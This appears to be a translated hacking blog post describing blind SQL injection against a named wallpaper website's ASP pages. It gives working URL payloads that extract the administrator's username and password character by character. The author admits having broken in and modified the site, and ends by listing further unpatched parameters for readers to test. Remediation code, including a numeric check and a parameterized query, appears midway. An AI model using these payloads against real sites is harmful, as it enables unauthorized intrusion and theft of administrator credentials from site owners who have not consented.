Author: safer. Source: cnwill.com
After cnwill.com was updated recently, I went on a leisurely online tour and visited a friend I met when I first got online. http://developer.hdskin.com/site is beautiful.
I was going to use his code to build the picture area of our dormitory site, but he only provides v1.1 [http://chinaz.com/download/software.asp?SOFTWAREID=8163].
Since the latest version, v1.2, is not provided, I decided to test whether the code has SQL injection vulnerabilities.
Guessing
Download the v1.1 code first. I assume v1.2 is an improvement on v1.1 but that the main structure has not changed.
First, test list.asp, because from experience scripts of the form *.asp?xx=* often contain vulnerabilities.
http://desk.hdskin.com/list.asp?id=1345 and 1=1 displays normally.
http://desk.hdskin.com/list.asp?id=1345 and 1=2 returns "You have not selected the wallpaper. Please return".
It looks like there is a problem. Let's look at the v1.1 code.
The problematic statement in list.asp is easy to find.
Code:
--------------------------------------------------------------------------------
' Vulnerable original: the raw id from the request is spliced into the SQL string
SQL = "select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits " & _
      "from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid " & _
      "and download.ID = " & Request("id")
--------------------------------------------------------------------------------
Request("id") is not processed at all. A good opportunity. Wish me luck. Hahahaha.
Check the table and column names of the v1.1 database. Administrator information is stored in the admin table: username is the administrator name, password is the management password, and flag is the permission level
(flag = 1 is the top administrator, flag = 2 is an ordinary administrator).
First, test whether http://desk.hdskin.com/list.asp?id=1 displays normally. If it does, use the following statement to guess.
Code:
--------------------------------------------------------------------------------
http://desk.hdskin.com/list.asp?id=(select min(id) from admin where left(password,1)=c and id=1)
--------------------------------------------------------------------------------
If it does not display properly, use the following statement to guess instead.
Code:
--------------------------------------------------------------------------------
http://desk.hdskin.com/list.asp?id=1345 and exists (select min(id) from admin where left(password,1)=c and id=1)
--------------------------------------------------------------------------------
A few notes on the guessing technique.
min(id) is the smallest id; you can also change it to max(id). id=1 is the id of the administrator in the admin table. left(password, n) takes the first n characters of the password column,
and right(password, n) takes the last n characters. From experience it is best to work from both the left and the right ends, which makes guessing faster!
First, let's guess the username and password length of the administrator with id=1.
Guess the username length:
http://desk.hdskin.com/list.asp?id=(select min(id) from admin where len(username)=8 and id=1)
Guess the management password length:
http://desk.hdskin.com/list.asp?id=(select min(id) from admin where len(password)=6 and id=1)
Check whether the admin table has the username sniper:
http://desk.hdskin.com/list.asp?id=1345 and sniper=(select username from admin where username=sniper)
Next, I used the tool written by ruder to guess the password; guessing by hand is too painful.
Guessing the password column:
URL field:
http://desk.hdskin.com/list.asp?id=1345 and exists (select min(id) from admin where left(password,1)=%c)
Feature string: a string from the page that shows it loaded normally (if the page loads normally, the guessed character of the name or password is correct).
Suppose the first character of the password is S.
Then change the URL field to http://desk.hdskin.com/list.asp?id=1345 and exists (select min(id) from admin where left(password,2)=S%c)
Suppose the second character is A.
Change the URL field to http://desk.hdskin.com/list.asp?id=1345 and exists (select min(id) from admin where left(password,3)=SA%c)
The username is guessed the same way. Just keep guessing! [Figure 1.gif]
Now let me talk about how to fix the vulnerability.
After I broke in and modified the website last week, the webmaster added a patch of his own.
Code:
--------------------------------------------------------------------------------
' The webmaster's patch: only an empty id is rejected; the value itself is still unchecked
If Request("id") = "" Then
    Response.Write "You have not selected the wallpaper. Please return"
    Response.End
End If
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits " & _
      "from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid " & _
      "and download.ID = " & Request("id")
--------------------------------------------------------------------------------
He probably thought this would block me!
The original code in list.asp:
Code:
--------------------------------------------------------------------------------
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits " & _
      "from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid and " & _
      "download.ID = " & Request("id")
rs.Open SQL, conn, 1, 1
' The same unchecked id is spliced into a second query as well
SQL = "select * from Dvote where downid = " & Request("id") & " order by id desc"
--------------------------------------------------------------------------------
Change it to:
Code:
--------------------------------------------------------------------------------
Dim idid
' Strip spaces, then accept only a numeric value
idid = Replace(Request("id"), " ", "")
If Not IsNumeric(idid) Or idid = "" Then
    Response.Write "Well, what do you want? I'm safer!"
    Response.End
End If
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits " & _
      "from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid and " & _
      "download.ID = " & idid
rs.Open SQL, conn, 1, 1
SQL = "select * from Dvote where downid = " & idid & " order by id desc"
' idid is restricted: only numbers can be entered
--------------------------------------------------------------------------------
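A stricter version of the same fix, as an added example that is not the site's or the author's code: it rejects anything that is not a plain string of digits (IsNumeric also accepts forms such as 1e3 or &H10) and binds the id as a query parameter through ADODB.Command instead of splicing it into the SQL text. It assumes the same tables and an open ADODB.Connection named conn as in the post; the helper name SafeId is my own.

```vbscript
<%
' Added example (not the site's own code): a hardened list.asp fragment.
' Assumes an open ADODB.Connection named conn and the tables from the post.

' SafeId (hypothetical helper): return the request value as a Long, or -1
' when it is not a plain string of digits. IsNumeric alone would also accept
' forms such as "1e3", "&H10" or "1,345", so every character is checked.
Function SafeId(raw)
    Dim s, i
    s = Trim(raw & "")          ' Request("id") may be Empty; force a string
    SafeId = -1
    If Len(s) = 0 Or Len(s) > 9 Then Exit Function   ' 9 digits always fit a Long
    For i = 1 To Len(s)
        If InStr("0123456789", Mid(s, i, 1)) = 0 Then Exit Function
    Next
    SafeId = CLng(s)
End Function

Dim id
id = SafeId(Request("id"))
If id < 0 Then
    Response.Write "You have not selected the wallpaper. Please return"
    Response.End
End If

' Parameterised query: the id is bound as a value, never spliced into the SQL
' text, so "1345 and exists (...)" cannot change the shape of the statement.
Dim cmd, rs, rsVote
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select Dclass.class, DNclass.Nclass, download.showname, " & _
    "download.classid, download.Nclassid, download.lasthits " & _
    "from download, Dclass, DNclass " & _
    "where download.classid = Dclass.classid " & _
    "and download.Nclassid = DNclass.Nclassid and download.ID = ?"
' 3 = adInteger, 1 = adParamInput (ADO constants written as numbers)
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , id)
Set rs = cmd.Execute

' The vote query reuses the same bound parameter instead of Request("id").
cmd.CommandText = "select * from Dvote where downid = ? order by id desc"
Set rsVote = cmd.Execute
%>
```

The same pattern applies to every page listed below (pai_news.asp, fenlei.asp, vote.asp, query.asp): validate the parameter and bind it, rather than concatenating it.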
-------------------------------------------------------------------------------
Next, let's take a look at other issues on his site.
pai_news.asp
rs.Open SQL, conn, 1, 3
SQL = "select Aclass.class, ANclass.Nclass, article.title, article.classid, article.Nclassid from article, Aclass, ANclass " & _
      "where article.classid = Aclass.classid and article.Nclassid = ANclass.Nclassid and article.articleID = " & Request("id")
rs.Open SQL, conn, 1, 1
Request("id") is still not processed. Follow the method above to extend this and test it yourself.
-------------------------------------------------------------------------------
fenlei.asp and news_index
classid = Request("classid")
This parameter is not processed either.
http://desk.hdskin.com/fenlei.asp?classid=3 and exists (select id from admin where flag=1) loads normally, which indicates a vulnerability!
-------------------------------------------------------------------------------
vote.asp
SQL = "select * from Dvote where downid = " & Request("id") & " order by id desc"
The id used for downid is not processed.
-------------------------------------------------------------------------------
query.asp
Nclassid = "Nclassid = " & CStr(Request("Nclassid")) & " and "
Nclassid is not processed.
-------------------------------------------------------------------------------
That is a rough look at it.